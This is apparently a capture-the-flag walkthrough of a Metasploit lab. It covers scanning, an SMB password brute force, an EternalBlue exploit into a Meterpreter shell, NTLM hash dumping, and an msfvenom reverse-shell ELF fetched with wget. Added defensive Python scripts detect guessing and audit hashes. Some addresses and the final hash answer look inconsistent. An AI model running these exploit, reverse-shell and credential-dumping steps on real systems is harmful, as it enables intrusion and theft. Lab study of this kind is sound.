Note:
- The questions are shortened for a cleaner view
- Questions that are straightforward will only have answers attached. Such questions can be easily answered by reading the documentation given in the room.
Task 1 - Introduction
No answer needed
Task 2 - Scanning
1) How many ports are open on the target system?
We can perform a quick nmap scan for this.
nmap -sS 10.48.148.151
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
8000/tcp open http-alt
Ans: 5
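To count open ports without reading the table by eye, and to pick out the services a defender would want to review first, here is a small parser for nmap's normal output. It is an added example, not part of the original writeup or of nmap; the embedded scan text is constructed from the port table above (the header lines are filled in as a typical nmap banner and are not from the page), and the set of services flagged for review (cleartext FTP and the NetBIOS/SMB pair) is this example's own choice.

```python
import re

# Constructed sample: the port table from the scan above, wrapped in a typical
# nmap banner so the script runs offline against realistic input.
NMAP_OUTPUT = """\
Nmap scan report for 10.48.148.151
Host is up (0.0010s latency).
Not shown: 995 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
8000/tcp open  http-alt
"""

# One port row: "<port>/<proto>  <state>  <service>"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")

# Services that should rarely be reachable from untrusted networks:
# FTP carries credentials in cleartext, and exposed NetBIOS/SMB is the
# attack surface the later MS17-010 task relies on.
REVIEW_SERVICES = {"ftp", "netbios-ssn", "microsoft-ds"}


def parse_ports(text):
    """Return [(port, proto, state, service), ...] from nmap normal output."""
    rows = []
    for line in text.splitlines():
        match = PORT_LINE.match(line)
        if match:
            rows.append((int(match.group(1)), match.group(2),
                         match.group(3), match.group(4)))
    return rows


def count_open(rows):
    """Number of rows whose state is exactly 'open' (filtered ports excluded)."""
    return sum(1 for _port, _proto, state, _svc in rows if state == "open")


def services_to_review(rows):
    """Sorted open ports whose service is in REVIEW_SERVICES."""
    return sorted(port for port, _proto, state, svc in rows
                  if state == "open" and svc in REVIEW_SERVICES)


if __name__ == "__main__":
    rows = parse_ports(NMAP_OUTPUT)
    print("open ports:", count_open(rows))
    print("review first:", services_to_review(rows))
```

Running it prints 5 open ports and lists 21, 139 and 445 for review; the parser deliberately ignores `filtered` and `closed` rows so the count matches what nmap reports as open.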
2) Using the relevant scanner, what NetBIOS name can you see?
We can run the udp_sweep auxiliary scanner for this:
setg RHOSTS 10.48.148.151
search udp_sweep
use 0
run
Discovered NetBIOS on 10.48.148.151:137 (__MSBROWSE__:<01>:G ::<00>:U ::<03>:U ::<20>:U :ACME IT SUPPORT:<00>:G :ACME IT SUPPORT:<1d>:U :ACME IT SUPPORT:<1e>:G :00:00:00:00:00:00)
Ans: ACME IT SUPPORT
3) What is running on port 8000?
We already know from the nmap scan that port 8000 is serving HTTP, so we can use the http_version scanner to identify the specific server software:
search http_version
use 0
set RPORT 8000
run
10.48.148.151:8000 webfs/1.21 ( 403-Forbidden )
Ans: webfs/1.21
4) What is the “penny” user’s SMB password?
Since I’m using the AttackBox, I already have the wordlist in my default wordlist directory. For this, we can use the smb_login module; it requires a bit of searching around to find.
set SMBUSER penny
set PASS_FILE /usr/share/wordlists/MetasploitRoom/MetasploitWordlist.txt
show info
Name: SMB Login Check Scanner
Module: auxiliary/scanner/smb/smb_login
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
tebo <tebo@attackresearch.com>
Ben Campbell <eat_meatballs@hotmail.co.uk>
Brandon McCann "zeknox" <bmccann@accuvant.com>
Tom Sellers <tom@fadedcode.net>
Check supported:
No
Basic options:
Name               Current Setting  Required  Description
----               ---------------  --------  -----------
ABORT_ON_LOCKOUT   false            yes       Abort the run when an account lockout is detected
ANONYMOUS_LOGIN    false            yes       Attempt to login with a blank username and password
BLANK_PASSWORDS    false            no        Try blank passwords for all users
BRUTEFORCE_SPEED   5                yes       How fast to bruteforce, from 0 to 5
CreateSession      false            no        Create a new session for every successful login
DB_ALL_CREDS       false            no        Try each user/password couple stored in the current database
DB_ALL_PASS        false            no        Add all passwords in the current database to the list
DB_ALL_USERS       false            no        Add all users in the current database to the list
DB_SKIP_EXISTING   none             no        Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
DETECT_ANY_AUTH    false            no        Enable detection of systems accepting any authentication
DETECT_ANY_DOMAIN  false            no        Detect if domain is required for the specified user
PASS_FILE          /usr/share/wordlists/MetasploitRoom/MetasploitWordlist.txt  no  File containing passwords, one per line
PRESERVE_DOMAINS   true             no        Respect a username that contains a domain name.
Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
RECORD_GUEST       false            no        Record guest-privileged random logins to the database
RHOSTS             10.48.148.151    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT              445              yes       The SMB service port (TCP)
SMBDomain          .                no        The Windows domain to use for authentication
SMBPass                             no        The password for the specified username
SMBUser            penny            no        The username to authenticate as
STOP_ON_SUCCESS    false            yes       Stop guessing when a credential works for a host
THREADS            1                yes       The number of concurrent threads (max one per host)
USERPASS_FILE                       no        File containing users and passwords separated by space, one pair per line
USER_AS_PASS       false            no        Try the username as the password for all users
USER_FILE                           no        File containing usernames, one per line
VERBOSE            true             yes       Whether to print output for all attempts
Description:
This module will test a SMB login on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.
References:
https://nvd.nist.gov/vuln/detail/CVE-1999-0506
View the full module info with the info -d command.
I’ve given the info output for convenience.
run
Ans: leo1234
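A wordlist attack like the one above leaves a distinctive trace on the target: a burst of failed logons from one source address, often followed by a success. The detection below is an added example, not part of the original writeup or of Metasploit; it runs a sliding-window count over a constructed, simplified key=value auth log (a real deployment would read Windows Security event 4625/4624 records or Samba auth logs instead). The AttackBox address 10.48.68.45 and the user penny are taken from this room; the second source 10.48.70.9 and the user bob are invented to show a benign pair of typos that must not alert.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample auth log in a simplified key=value form (not a real
# Windows or Samba record). Six rapid failures from 10.48.68.45 then a
# success; two spaced-out failures from 10.48.70.9 that are just typos.
SAMPLE_LOG = """\
2025-11-01T06:00:01Z src=10.48.68.45 user=penny result=FAIL
2025-11-01T06:00:02Z src=10.48.68.45 user=penny result=FAIL
2025-11-01T06:00:03Z src=10.48.68.45 user=penny result=FAIL
2025-11-01T06:00:04Z src=10.48.68.45 user=penny result=FAIL
2025-11-01T06:00:05Z src=10.48.68.45 user=penny result=FAIL
2025-11-01T06:00:06Z src=10.48.68.45 user=penny result=FAIL
2025-11-01T06:00:07Z src=10.48.68.45 user=penny result=SUCCESS
2025-11-01T06:05:00Z src=10.48.70.9 user=bob result=FAIL
2025-11-01T06:05:30Z src=10.48.70.9 user=bob result=FAIL
2025-11-01T06:05:40Z src=10.48.70.9 user=bob result=SUCCESS
"""


def parse_line(line):
    """Split one record into (timestamp, source, user, result)."""
    ts_text, *pairs = line.split()
    fields = dict(pair.split("=", 1) for pair in pairs)
    ts = datetime.strptime(ts_text, "%Y-%m-%dT%H:%M:%SZ")
    return ts, fields["src"], fields["user"], fields["result"]


def detect_guessing(log_text, threshold=5, window=timedelta(seconds=60)):
    """
    Sliding-window count of failed logons per source address.

    Returns {src: {"first_alert": ts, "failures": n, "success_after": ts|None}}
    for every source that reached `threshold` failures inside `window`.
    A success that follows an alerted burst is recorded separately because a
    guess that eventually worked is the case that needs an immediate reset.
    """
    recent = defaultdict(deque)   # src -> timestamps of failures in window
    alerts = {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, src, _user, result = parse_line(line)
        if result != "FAIL":
            if src in alerts:
                alerts[src]["success_after"] = ts
            continue
        queue = recent[src]
        queue.append(ts)
        while ts - queue[0] > window:   # drop failures older than the window
            queue.popleft()
        if len(queue) >= threshold and src not in alerts:
            alerts[src] = {"first_alert": ts, "failures": len(queue),
                           "success_after": None}
    return alerts


if __name__ == "__main__":
    for src, info in detect_guessing(SAMPLE_LOG).items():
        print(src, info)
```

With the defaults (5 failures in 60 seconds) the AttackBox source alerts at the fifth failure and the later success is attached to that alert, while the two typos from 10.48.70.9 never reach the threshold. In practice the threshold should sit below any lockout policy in force, since the module's ABORT_ON_LOCKOUT option shows the attacker side is watching for lockouts too.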
Task 3 - The Metasploit Database
No answer needed
Task 4 - Vulnerability Scanning
1) Who wrote the module that checks SMTP servers for open relay?
We can search around using the keywords:
search smtp open relay
use 0
show info
Provided by:
Campbell Murray
xistence <xistence@0x90.nl>
Ans: Campbell Murray
Task 5 - Exploitation
1) Exploit one of the critical vulnerabilities on the target VM
No answer needed
2) What is the content of the flag.txt file?
The vulnerability is EternalBlue (MS17-010), as that is what the entire task is about. We can essentially follow the same steps given in the task to exploit it.
Do not forget to start the new machine and change your RHOSTS IP.
search MS17
use 0
set RHOSTS 10.48.144.53
exploit
exploit
[*] Started reverse TCP handler on 10.48.68.45:4444
[*] 10.48.144.53:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.48.144.53:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.48.144.53:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.48.144.53:445 - The target is vulnerable.
[*] 10.48.144.53:445 - Connecting to target for exploitation.
[+] 10.48.144.53:445 - Connection established for exploitation.
[+] 10.48.144.53:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.48.144.53:445 - CORE raw buffer dump (42 bytes)
[*] 10.48.144.53:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.48.144.53:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.48.144.53:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.48.144.53:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.48.144.53:445 - Trying exploit with 12 Groom Allocations.
[*] 10.48.144.53:445 - Sending all but last fragment of exploit packet
[*] 10.48.144.53:445 - Starting non-paged pool grooming
[+] 10.48.144.53:445 - Sending SMBv2 buffers
[+] 10.48.144.53:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.48.144.53:445 - Sending final SMBv2 buffers.
[*] 10.48.144.53:445 - Sending last fragment of exploit packet!
[*] 10.48.144.53:445 - Receiving response from exploit packet
[+] 10.48.144.53:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.48.144.53:445 - Sending egg to corrupted connection.
[*] 10.48.144.53:445 - Triggering free of corrupted buffer.
[*] Sending stage (203846 bytes) to 10.48.144.53
[*] Meterpreter session 2 opened (10.48.68.45:4444 -> 10.48.144.53:49163) at 2025-11-01 06:14:19 +0000
[+] 10.48.144.53:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.48.144.53:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.48.144.53:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Since we did not specify a payload, the module used its default Meterpreter reverse TCP payload, which gives us a Meterpreter session on the target.
We can search for the flag from that session with:
search -f flag.txt
Found 1 result...
=================
Path Size (bytes) Modified (UTC)
---- ------------ --------------
c:\Users\Jon\Documents\flag.txt 15 2021-07-15 03:39:25 +0100
cat /Users/Jon/Documents/flag.txt
Ans: THM-5455554845
3) What is the NTLM hash of the password of the user “pirate”?
We can use the Meterpreter hashdump command for this:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pirate:1001:aad3b435b51404eeaad3b435b51404ee:8ce9a3ebd1647fcc5e04025019f4b875:::
Ans: 8ce9a3ebd1647fcc5e04025019f4b875
Task 6 - Msfvenom
6) What is the other user’s password hash?
Follow the task instructions.
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.48.81.220 LPORT=7777 -f elf > rev_shell.elf
python3 -m http.server 9000
ssh murphy@10.48.177.203
sudo su
wget http://10.48.117.203:9000/rev_shell.elf
chmod +x rev_shell.elf
In the msfconsole terminal:
use multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 10.48.81.220
set LPORT 7777
Once we have a shell, we can look for the hashes. The Linux equivalent of hashdump is the module post/linux/gather/hashdump.
First we background the Meterpreter session, then:
use post/linux/gather/hashdump
set session 1
run
Ans:
SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0
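The two hashdump outputs in this writeup (the Windows pwdump lines in Task 5 and the Linux shadow-style result here) are exactly what a defender reviews after an incident or during a hygiene check. The audit below is an added example, not part of the original writeup or of Metasploit: it flags Windows accounts whose NT hash is the well-known hash of the empty string (a blank password) or that still store an LM hash, and Linux accounts with no password or a legacy hash algorithm. The pwdump lines are the three from Task 5; the shadow lines are constructed with placeholder salts and hashes, and the users root, legacy, svc and nopass are invented (murphy is the room's user).

```python
# Well-known hashes of the empty string; an account whose NT hash equals
# EMPTY_NT has a blank password, and EMPTY_LM means "no LM hash stored".
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# pwdump format, user:rid:lm:nt:::, as returned by hashdump in Task 5.
PWDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pirate:1001:aad3b435b51404eeaad3b435b51404ee:8ce9a3ebd1647fcc5e04025019f4b875:::
"""

# Constructed /etc/shadow-style lines. Salt and hash values are placeholders,
# not real hashes; only the algorithm prefix matters to the audit.
SHADOW = """\
root:$6$PLACEHOLDERSALT$PLACEHOLDERHASH:19900:0:99999:7:::
murphy:$y$j9T$PLACEHOLDERSALT$PLACEHOLDERHASH:19900:0:99999:7:::
legacy:$1$PLACEHOLDER$PLACEHOLDERHASH:17000:0:99999:7:::
svc:!:19900:0:99999:7:::
nopass::19900:0:99999:7:::
"""


def audit_pwdump(text):
    """Return [(user, finding), ...] for Windows pwdump-format lines."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        user, _rid, lm, nt = line.split(":")[:4]
        if nt.lower() == EMPTY_NT:
            # Guest is normally disabled; Administrator with a blank
            # password is the finding that needs action.
            findings.append((user, "blank password"))
        if lm.lower() != EMPTY_LM:
            findings.append((user, "LM hash stored"))
    return findings


def audit_shadow(text):
    """Return [(user, finding), ...] for /etc/shadow-format lines."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        user, hash_field = line.split(":")[:2]
        if hash_field == "":
            findings.append((user, "no password set"))
        elif hash_field.startswith(("!", "*")):
            continue                      # locked or no-login: not a weakness
        elif hash_field.startswith("$1$"):
            findings.append((user, "md5crypt hash"))
        elif not hash_field.startswith("$"):
            findings.append((user, "legacy DES crypt hash"))
        # $6$ (sha512crypt), $y$ (yescrypt), $2*$ (bcrypt) pass unflagged.
    return findings


if __name__ == "__main__":
    for user, finding in audit_pwdump(PWDUMP) + audit_shadow(SHADOW):
        print(f"{user}: {finding}")
```

On the Task 5 dump this reports Administrator and Guest as having blank passwords (pirate has a real NT hash, so it is not flagged); on the constructed shadow lines it flags legacy for md5crypt and nopass for an empty password field, while the locked svc account and the sha512crypt/yescrypt users pass.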
